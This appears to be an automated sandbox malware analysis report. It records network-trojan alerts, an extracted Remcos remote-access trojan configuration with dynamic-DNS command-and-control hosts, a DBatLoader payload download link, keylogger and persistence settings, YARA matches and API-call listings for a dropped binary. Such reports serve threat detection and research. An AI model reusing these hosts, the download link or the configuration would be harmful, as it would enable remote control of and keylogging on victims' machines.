                  2024-11-30T21:20:24.496412+010020528521A Network Trojan was detected192.168.2.4612571.1.1.153UDP
                  2024-11-30T21:20:29.206114+010020528521A Network Trojan was detected192.168.2.4573101.1.1.153UDP
                  2024-11-30T21:20:35.031611+010020528521A Network Trojan was detected192.168.2.4502361.1.1.153UDP
                  2024-11-30T21:20:40.879401+010020528521A Network Trojan was detected192.168.2.4498441.1.1.153UDP
                  2024-11-30T21:20:46.690949+010020528521A Network Trojan was detected192.168.2.4574901.1.1.153UDP
                  2024-11-30T21:20:51.472702+010020528521A Network Trojan was detected192.168.2.4580671.1.1.153UDP
                  2024-11-30T21:20:56.191186+010020528521A Network Trojan was detected192.168.2.4499501.1.1.153UDP
                  2024-11-30T21:21:01.336260+010020528521A Network Trojan was detected192.168.2.4510701.1.1.153UDP
                  2024-11-30T21:21:06.472411+010020528521A Network Trojan was detected192.168.2.4600831.1.1.153UDP
                  2024-11-30T21:21:11.300691+010020528521A Network Trojan was detected192.168.2.4556171.1.1.153UDP
                  2024-11-30T21:21:16.081947+010020528521A Network Trojan was detected192.168.2.4648351.1.1.153UDP
                  2024-11-30T21:21:20.911866+010020528521A Network Trojan was detected192.168.2.4511151.1.1.153UDP
                  2024-11-30T21:21:26.003395+010020528521A Network Trojan was detected192.168.2.4561461.1.1.153UDP
                  2024-11-30T21:21:30.894482+010020528521A Network Trojan was detected192.168.2.4507901.1.1.153UDP
                  2024-11-30T21:21:35.895926+010020528521A Network Trojan was detected192.168.2.4575281.1.1.153UDP
                  2024-11-30T21:21:40.893780+010020528521A Network Trojan was detected192.168.2.4560281.1.1.153UDP
                  2024-11-30T21:21:45.894664+010020528521A Network Trojan was detected192.168.2.4630601.1.1.153UDP
                  2024-11-30T21:21:51.032885+010020528521A Network Trojan was detected192.168.2.4522451.1.1.153UDP
                  2024-11-30T21:21:55.976395+010020528521A Network Trojan was detected192.168.2.4645741.1.1.153UDP
                  2024-11-30T21:22:00.894512+010020528521A Network Trojan was detected192.168.2.4633801.1.1.153UDP
                  2024-11-30T21:22:05.893787+010020528521A Network Trojan was detected192.168.2.4566311.1.1.153UDP
                  2024-11-30T21:22:10.893994+010020528521A Network Trojan was detected192.168.2.4606931.1.1.153UDP
                  2024-11-30T21:22:16.047392+010020528521A Network Trojan was detected192.168.2.4567321.1.1.153UDP
                  2024-11-30T21:22:20.894190+010020528521A Network Trojan was detected192.168.2.4529061.1.1.153UDP
                  2024-11-30T21:22:26.039719+010020528521A Network Trojan was detected192.168.2.4586451.1.1.153UDP
                  2024-11-30T21:22:31.032671+010020528521A Network Trojan was detected192.168.2.4519401.1.1.153UDP
                  2024-11-30T21:22:35.894408+010020528521A Network Trojan was detected192.168.2.4636271.1.1.153UDP
                  2024-11-30T21:22:41.044412+010020528521A Network Trojan was detected192.168.2.4547551.1.1.153UDP
                  2024-11-30T21:22:45.894345+010020528521A Network Trojan was detected192.168.2.4511181.1.1.153UDP
                  2024-11-30T21:22:50.894264+010020528521A Network Trojan was detected192.168.2.4522561.1.1.153UDP
                  2024-11-30T21:22:55.893930+010020528521A Network Trojan was detected192.168.2.4499571.1.1.153UDP
                  2024-11-30T21:23:00.893949+010020528521A Network Trojan was detected192.168.2.4564381.1.1.153UDP
                  2024-11-30T21:23:05.900296+010020528521A Network Trojan was detected192.168.2.4563031.1.1.153UDP
                  2024-11-30T21:23:11.033781+010020528521A Network Trojan was detected192.168.2.4497021.1.1.153UDP
                  2024-11-30T21:23:15.893889+010020528521A Network Trojan was detected192.168.2.4502221.1.1.153UDP
                  2024-11-30T21:23:20.912006+010020528521A Network Trojan was detected192.168.2.4539831.1.1.153UDP
                  2024-11-30T21:23:25.893898+010020528521A Network Trojan was detected192.168.2.4572651.1.1.153UDP
                  2024-11-30T21:23:31.042070+010020528521A Network Trojan was detected192.168.2.4506221.1.1.153UDP
                  2024-11-30T21:23:35.904215+010020528521A Network Trojan was detected192.168.2.4508891.1.1.153UDP
                  2024-11-30T21:23:40.894723+010020528521A Network Trojan was detected192.168.2.4630841.1.1.153UDP
                  2024-11-30T21:23:45.894596+010020528521A Network Trojan was detected192.168.2.4540351.1.1.153UDP
                  2024-11-30T21:23:50.933762+010020528521A Network Trojan was detected192.168.2.4636291.1.1.153UDP
                  2024-11-30T21:23:56.039056+010020528521A Network Trojan was detected192.168.2.4613911.1.1.153UDP
                  2024-11-30T21:24:00.894426+010020528521A Network Trojan was detected192.168.2.4616321.1.1.153UDP
                  2024-11-30T21:24:06.593437+010020528521A Network Trojan was detected192.168.2.4522721.1.1.153UDP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-30T21:20:14.729773+010020528531A Network Trojan was detected192.168.2.4580981.1.1.153UDP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: mysweeterbk.ddns.netAvira URL Cloud: Label: malware
                  Source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["tre1ms.freeddns.org:2404:1", "freshmysweeterbk.ddns.net:2404:1", "mysweeterbk.ddns.net:2404:1", "bbhmeetre1ms.freeddns.org:2404:1", "myumysmeetr.ddns.net:2404:1", "meetre1ms.freeddns.org:2404:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-B5YX7T", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "ANYDESKS"}
                  Source: 17.3.esentutl.exe.5440000.0.raw.unpackMalware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.google.com/uc?export=download&id=1qaR7oME9Rq4xBPQuXwqOCqRneMWsSMRv"]}
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFReversingLabs: Detection: 23%
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFReversingLabs: Detection: 23%
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f40000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a71937.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 30.2.SndVol.exe.4a70000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 19.2.colorcpl.exe.6f41937.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7088, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 3848, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ANYDESKS\logs.dat, type: DROPPED
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.7% probability
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,6_2_00007FF6A29D2C2C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,6_2_00007FF6A29D2F38
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A023E8 BCryptResolveProviders,#360,#360,BCryptFreeBuffer,6_2_00007FF6A2A023E8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A98404 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF6A2A98404
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E4410 GetUserDefaultUILanguage,GetSystemDefaultUILanguage,#357,#357,CryptFindOIDInfo,CryptEnumOIDInfo,#360,CryptFindOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,CryptEnumOIDInfo,#258,#358,#357,#357,#357,LocalFree,#224,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29E4410
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A56374 memset,#358,#357,LocalFree,LocalFree,#357,#357,_strlwr,#357,LocalFree,LocalFree,lstrcmpW,#359,#359,#357,CryptAcquireContextW,GetLastError,#256,CryptGenRandom,GetLastError,#254,#357,fopen,fopen,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,LocalAlloc,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,fprintf,#357,LocalFree,#357,fprintf,fprintf,CertOpenStore,GetLastError,LocalAlloc,CertSaveStore,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,CertFreeCertificateContext,fclose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptDestroyKey,CryptReleaseContext,CryptReleaseContext,fprintf,fprintf,fflush,ferror,6_2_00007FF6A2A56374
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A52358 #357,#357,CryptReleaseContext,CryptReleaseContext,CertFreeCertificateContext,CertFreeCertificateContext,6_2_00007FF6A2A52358
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EE3B0 #357,#357,CryptDecodeObject,LocalFree,6_2_00007FF6A29EE3B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29D44E0 #357,#256,#357,GetLastError,CryptImportPublicKeyInfoEx2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalAlloc,GetLastError,memmove,BCryptVerifySignature,BCryptVerifySignature,BCryptDestroyKey,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29D44E0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A324D4 #357,CertCompareCertificateName,CertCompareCertificateName,GetSystemTime,SystemTimeToFileTime,GetLastError,#357,CompareFileTime,CompareFileTime,CompareFileTime,CompareFileTime,CryptVerifyCertificateSignature,GetLastError,#357,strcmp,strcmp,#357,#357,#357,CertCompareCertificateName,#357,CertCompareCertificateName,#357,CertFreeCTLContext,6_2_00007FF6A2A324D4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8E516 ??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,LocalFree,NCryptIsKeyHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6A2A8E516
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EC514 CryptGetProvParam,SetLastError,LocalAlloc,LocalFree,6_2_00007FF6A29EC514
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3A450 #357,#358,#357,#223,SetLastError,SetLastError,memmove,memmove,#357,#357,GetLastError,#357,#357,strcmp,GetLastError,strcmp,strcmp,strcmp,qsort,#357,CompareFileTime,CompareFileTime,#357,#357,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,CryptMsgClose,CertCloseStore,CertCloseStore,CertFreeCTLContext,LocalFree,free,6_2_00007FF6A2A3A450
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3C450 CertOpenStore,GetLastError,#357,CryptQueryObject,CertAddStoreToCollection,GetLastError,#357,CertAddStoreToCollection,GetLastError,CertOpenStore,GetLastError,CertAddStoreToCollection,GetLastError,CertCloseStore,CertCloseStore,CertCloseStore,CertCloseStore,6_2_00007FF6A2A3C450
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A58488 #357,CertGetCertificateChain,GetLastError,LocalAlloc,CertGetCRLContextProperty,GetLastError,GetLastError,GetLastError,CryptAcquireContextW,GetLastError,memset,CryptMsgOpenToEncode,GetLastError,CryptMsgUpdate,GetLastError,#357,#357,CryptReleaseContext,CryptMsgClose,CertCloseStore,CertFreeCertificateChain,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A58488
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,6_2_00007FF6A2A4A1E8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC6214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,6_2_00007FF6A2AC6214
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,6_2_00007FF6A2A5E1F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,6_2_00007FF6A2A9A1F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AC613C CryptDecodeObjectEx,6_2_00007FF6A2AC613C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A021A4 #360,#359,#357,#357,BCryptFreeBuffer,6_2_00007FF6A2A021A4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A861AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,6_2_00007FF6A2A861AC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A46194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6A2A46194
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,6_2_00007FF6A2A2417C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ACA2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,6_2_00007FF6A2ACA2E0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A00300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,6_2_00007FF6A2A00300
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8E274 GetLastError,#358,CryptAcquireCertificatePrivateKey,GetLastError,#357,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,LocalFree,NCryptIsKeyHandle,GetLastError,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6A2A8E274
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A98298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,6_2_00007FF6A2A98298
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A82278 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,LocalAlloc,memmove,#357,#357,CryptDestroyHash,CryptReleaseContext,6_2_00007FF6A2A82278
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A36280 #357,#254,#357,CertGetCRLContextProperty,GetLastError,memcmp,#254,#357,#360,#360,CertGetPublicKeyLength,GetLastError,#359,strcmp,GetLastError,CryptFindOIDInfo,#357,LocalFree,CryptFindOIDInfo,#357,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A36280
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A607F4 BCryptDestroyKey,#205,#357,6_2_00007FF6A2A607F4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4C7F0 GetLastError,#357,CertOpenStore,GetLastError,CertEnumCertificatesInStore,CertCompareCertificateName,CertFindExtension,CryptDecodeObject,GetLastError,#357,CertGetCRLContextProperty,GetLastError,#357,CertSetCTLContextProperty,GetLastError,#357,GetSystemTimeAsFileTime,I_CryptCreateLruEntry,GetLastError,#357,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,GetLastError,#357,CertEnumCertificatesInStore,I_CryptCreateLruEntry,GetLastError,#357,I_CryptFindLruEntry,I_CryptRemoveLruEntry,#357,CertFreeCertificateChain,GetLastError,I_CryptInsertLruEntry,I_CryptReleaseLruEntry,#357,CertCloseStore,CertFreeCertificateContext,6_2_00007FF6A2A4C7F0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A707D0 memset,#357,#360,#359,#357,#358,LoadCursorW,SetCursor,#360,#358,CertGetPublicKeyLength,GetLastError,#357,strcmp,GetLastError,#357,CryptFindOIDInfo,#357,#357,LocalFree,#357,LocalFree,#358,#358,#357,SetCursor,SetCursor,#359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,#357,#357,#225,#359,#359,#357,#359,LocalFree,#359,#223,#359,#357,#223,#359,#359,#359,DialogBoxParamW,SysStringByteLen,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,SysFreeString,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,6_2_00007FF6A2A707D0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A527BC _strnicmp,#357,#357,#357,#357,CryptDecodeObject,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A527BC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29C67CC LocalAlloc,#357,GetSystemTimeAsFileTime,LocalAlloc,#357,LocalAlloc,#357,memmove,memcmp,CryptEncodeObjectEx,memmove,LocalFree,GetLastError,#357,#359,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29C67CC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E6824 CryptHashCertificate,GetLastError,#357,6_2_00007FF6A29E6824
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A98814 NCryptIsKeyHandle,NCryptIsKeyHandle,#357,#359,#357,CryptFindOIDInfo,LocalAlloc,#357,LocalAlloc,#357,CryptFindOIDInfo,#359,LocalAlloc,#357,memmove,LocalFree,#357,6_2_00007FF6A2A98814
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9A740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6A2A9A740
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60740 BCryptCloseAlgorithmProvider,#205,#357,#357,6_2_00007FF6A2A60740
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A607A4 BCryptDestroyHash,#205,#357,6_2_00007FF6A2A607A4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A608EC BCryptGetProperty,#205,#359,#357,#357,6_2_00007FF6A2A608EC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29DA8CC CryptFindLocalizedName,CertEnumCertificatesInStore,CertFindCertificateInStore,CertGetCRLContextProperty,#357,#357,#357,CertEnumCertificatesInStore,6_2_00007FF6A29DA8CC
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A94914 GetLastError,#359,CryptGetUserKey,CryptGetUserKey,GetLastError,#357,CryptDestroyKey,CryptReleaseContext,6_2_00007FF6A2A94914
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4E914 CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,GetLastError,GetLastError,GetLastError,#357,CryptDestroyHash,6_2_00007FF6A2A4E914
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60844 BCryptExportKey,#205,#359,#357,#357,6_2_00007FF6A2A60844
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ACE8B0 CryptDecodeObjectEx,GetLastError,CryptBinaryToStringW,GetLastError,memset,CryptBinaryToStringW,??3@YAXPEAX@Z,LocalFree,6_2_00007FF6A2ACE8B0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A225E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,6_2_00007FF6A2A225E8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29EC5D4 NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#357,#357,#357,#357,LocalFree,LocalFree,6_2_00007FF6A29EC5D4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F0630 #357,CryptDecodeObject,GetLastError,#357,GetLastError,GetLastError,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A29F0630
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29E8600 #357,CryptDecodeObject,GetLastError,LocalFree,6_2_00007FF6A29E8600
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A665B4 NCryptIsKeyHandle,_CxxThrowException,6_2_00007FF6A2A665B4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A9A590 GetLastError,#359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,6_2_00007FF6A2A9A590
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ACA58C NCryptOpenStorageProvider,NCryptOpenKey,NCryptGetProperty,GetProcessHeap,HeapAlloc,NCryptGetProperty,NCryptFreeObject,NCryptFreeObject,6_2_00007FF6A2ACA58C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A5E57C CertOpenStore,GetLastError,#357,CertAddEncodedCertificateToStore,GetLastError,#358,CryptFindCertificateKeyProvInfo,GetLastError,#358,#357,CertSetCTLContextProperty,GetLastError,CryptAcquireCertificatePrivateKey,GetLastError,CertSetCTLContextProperty,GetLastError,LocalFree,CertFreeCertificateContext,CertCloseStore,6_2_00007FF6A2A5E57C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A026E0 #357,#357,LocalAlloc,memmove,memset,#357,BCryptFreeBuffer,#357,#357,#357,6_2_00007FF6A2A026E0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A966D8 NCryptFreeObject,#360,6_2_00007FF6A2A966D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A886D8 CertFindCertificateInStore,CryptAcquireCertificatePrivateKey,GetLastError,#359,CertFindCertificateInStore,GetLastError,#359,#357,CertFreeCertificateContext,6_2_00007FF6A2A886D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A52724 CryptDecodeObject,GetLastError,#357,6_2_00007FF6A2A52724
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96654 NCryptGetProperty,#360,6_2_00007FF6A2A96654
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A2A654 CryptVerifyCertificateSignature,GetLastError,#358,CertVerifyTimeValidity,CertOpenStore,GetLastError,#357,CryptVerifyCertificateSignature,CertVerifyRevocation,GetLastError,#357,CertCloseStore,6_2_00007FF6A2A2A654
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A34694 CertFindAttribute,CryptHashCertificate2,memcmp,#357,6_2_00007FF6A2A34694
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F6694 CryptQueryObject,GetLastError,#359,#357,#357,LocalFree,CertCloseStore,CryptMsgClose,6_2_00007FF6A29F6694
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A90BF4 CryptDuplicateHash,GetLastError,#357,CryptGetHashParam,GetLastError,#203,CryptDestroyHash,6_2_00007FF6A2A90BF4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A62BC0 CryptCreateHash,#205,GetLastError,#357,#357,#357,SetLastError,6_2_00007FF6A2A62BC0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29FCC24 CryptDecodeObjectEx,#359,BCryptSetProperty,BCryptGetProperty,#357,BCryptDestroyKey,BCryptCloseAlgorithmProvider,6_2_00007FF6A29FCC24
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A96C30 NCryptOpenStorageProvider,#360,6_2_00007FF6A2A96C30
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2ACEB38 CryptDecodeObjectEx,GetLastError,??3@YAXPEAX@Z,LocalFree,6_2_00007FF6A2ACEB38
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8CBB4 CryptGetProvParam,GetLastError,#358,LocalAlloc,#357,CryptGetProvParam,GetLastError,#357,LocalFree,6_2_00007FF6A2A8CBB4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29ECB98 NCryptIsKeyHandle,GetLastError,#358,#360,NCryptIsKeyHandle,CryptGetProvParam,GetLastError,#357,#359,LocalFree,NCryptIsKeyHandle,CryptGetUserKey,GetLastError,#357,CryptGetKeyParam,GetLastError,#359,CryptDestroyKey,NCryptIsKeyHandle,#359,NCryptIsKeyHandle,6_2_00007FF6A29ECB98
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A90B9C CryptHashData,GetLastError,#357,6_2_00007FF6A2A90B9C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A60B80 NCryptCreatePersistedKey,#205,#359,#359,#357,6_2_00007FF6A2A60B80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AB8CF4 GetLastError,#360,CryptGetProvParam,GetLastError,#360,#359,LocalAlloc,CryptGetProvParam,GetLastError,#357,LocalFree,CryptReleaseContext,GetLastError,LocalAlloc,CryptGetProvParam,GetLastError,#358,LocalFree,LocalFree,#357,CryptReleaseContext,LocalFree,6_2_00007FF6A2AB8CF4
